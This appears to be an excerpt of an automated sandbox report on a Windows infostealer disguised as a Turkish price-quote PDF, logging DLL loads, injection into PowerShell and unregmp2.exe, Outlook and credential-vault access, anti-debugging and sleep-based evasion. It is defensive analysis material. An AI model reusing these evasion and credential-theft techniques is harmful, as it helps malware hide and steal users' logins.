            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: slc.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: unregmp2.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: owYCvHvzfwuh.exe, 00000008.00000002.3778328626.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3778593047.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: unregmp2.pdbGCTL source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_075D4425 pushfd ; retf 0_2_075D4426
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00418893 push 00000067h; ret 7_2_00418910
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00418907 push 00000067h; ret 7_2_00418910
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004051F1 push es; iretd 7_2_004051F3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004052E7 push F2DD9F13h; ret 7_2_004052EC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004053C6 push ebx; retf 7_2_004053CA
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004183DA push 00000018h; ret 7_2_004183DC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004084EE push ss; ret 7_2_004084FA
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00403480 push eax; ret 7_2_00403482
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00401DA0 push es; retf 7_2_00401DA3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00401DA8 push es; retf 7_2_00401DA3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0041A66B push ecx; ret 7_2_0041A67D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0041A69C push ecx; ret 7_2_0041A67D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0040BF29 pushfd ; retf 7_2_0040BF31
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0040A7DF push ds; retf 7_2_0040A7E0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_00407784 push esi; retf 7_2_00407789
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA225F pushad ; ret 7_2_01AA27F9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA27FA pushad ; ret 7_2_01AA27F9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD09AD push ecx; mov dword ptr [esp], ecx7_2_01AD09B6
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA283D push eax; iretd 7_2_01AA2858
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA1368 push eax; iretd 7_2_01AA1369
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA9939 push es; iretd 7_2_01AA9940
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D009AD push ecx; mov dword ptr [esp], ecx9_2_04D009B6
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BC4301 push esi; retf 9_2_00BC4306
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BC8AA6 pushfd ; retf 9_2_00BC8AAE
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BD4F57 push 00000018h; ret 9_2_00BD4F59
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BC506B push ss; ret 9_2_00BC5077
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BD71F3 push ecx; ret 9_2_00BD71FA
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BD7130 push ds; retf 7E3Eh9_2_00BD719F
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BDD102 pushfd ; iretd 9_2_00BDD103
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BDD15E push esp; iretd 9_2_00BDD165
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic PE information: section name: .text entropy: 7.983864382590907
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\unregmp2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe PID: 6604, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 11D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 7C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 73B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 8C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 9C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 9FD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: AFD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: BFD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: D2A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: E2A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: F2A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: F930000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B1096E rdtsc 7_2_01B1096E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1365Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 375Jump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeWindow / User API: threadDelayed 503Jump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeWindow / User API: threadDelayed 9468Jump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe TID: 6300Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764Thread sleep count: 503 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764Thread sleep time: -1006000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764Thread sleep count: 9468 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764Thread sleep time: -18936000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784Thread sleep time: -48000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784Thread sleep count: 48 > 30Jump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784Thread sleep time: -48000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BDBE00 FindFirstFileW,FindNextFileW,FindClose,9_2_00BDBE00
            Source: 7454168B.9.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: 7454168B.9.drBinary or memory string: global block list test formVMware20,11696497155
            Source: 7454168B.9.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: 7454168B.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1326636607.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: 7454168B.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: 7454168B.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 7454168B.9.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Process queried: DebugPort
            Source: C:\Windows\SysWOW64\unregmp2.exe
            Process queried: DebugPort
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Code function: 7_2_01B1096E rdtsc 7_2_01B1096E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Code function: 7_2_00417893 LdrLoadDll, 7_2_00417893
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4260 mov eax, dword ptr fs:[00000030h]7_2_01AD4260
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4260 mov eax, dword ptr fs:[00000030h]7_2_01AD4260
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4260 mov eax, dword ptr fs:[00000030h]7_2_01AD4260
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA625D mov eax, dword ptr fs:[00000030h]7_2_01BA625D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8A250 mov eax, dword ptr fs:[00000030h]7_2_01B8A250
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8A250 mov eax, dword ptr fs:[00000030h]7_2_01B8A250
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD6259 mov eax, dword ptr fs:[00000030h]7_2_01AD6259
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B58243 mov eax, dword ptr fs:[00000030h]7_2_01B58243
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B58243 mov ecx, dword ptr fs:[00000030h]7_2_01B58243
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACA250 mov eax, dword ptr fs:[00000030h]7_2_01ACA250
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B505A7 mov eax, dword ptr fs:[00000030h]7_2_01B505A7
